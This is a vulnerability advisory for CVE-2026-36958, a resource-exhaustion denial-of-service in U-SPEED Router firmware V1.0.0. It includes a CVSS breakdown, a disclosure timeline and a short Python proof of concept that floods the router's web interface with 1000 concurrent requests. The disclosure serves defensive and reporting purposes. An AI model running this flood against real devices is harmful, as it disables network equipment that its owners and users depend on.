
Proof-of-concept for CVE-2026-36958, a denial-of-service vulnerability in U-SPEED Router firmware that exhausts resources via concurrent HTTP requests, causing the web interface to become unresponsive.
CVE ID: CVE-2026-36958 Date: 2026-04-29 Discoverer: Kirubel Solomne Vendor: U-SPEED Product: U-SPEED Router Firmware Version: V1.0.0 CWE: CWE-400 - Uncontrolled Resource Consumption
The U-SPEED Router firmware V1.0.0 is vulnerable to Denial of Service. By sending a large number of concurrent HTTP requests to random or non-existent endpoints on the web management interface, an attacker can exhaust system resources in the embedded Boa HTTP server. This causes the router web interface to become unresponsive and may require a manual reboot to restore normal operation.
CVSS v3.1 Score: 7.5 (High)
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
| Metric | Value |
|---|
| Attack Vector | Network |
| Attack Complexity | Low |
| Privileges Required | None |
| User Interaction | None |
| Confidentiality Impact | None |
| Integrity Impact | None |
| Availability Impact | High |
import requests
import threading
TARGET = "http://192.168.10.1"
def flood(i):
try:
requests.get(f"{TARGET}/random_endpoint_{i}", timeout=2)
except:
pass
threads = []
for i in range(1000):
t = threading.Thread(target=flood, args=(i,))
threads.append(t)
t.start()
for t in threads:
t.join()
print("Done. Check if router web interface is still responsive.")
Expected Behavior: Server should handle concurrent connections gracefully. Actual Behavior: Web interface becomes unresponsive; manual reboot required.
| Date | Event |
|---|---|
| 2026-04-29 | Vulnerability discovered |
| 2026-04-29 | Reported to MITRE |
| 2026-04-29 | CVE-2026-36958 assigned |
| 2026-04-29 | Public disclosure |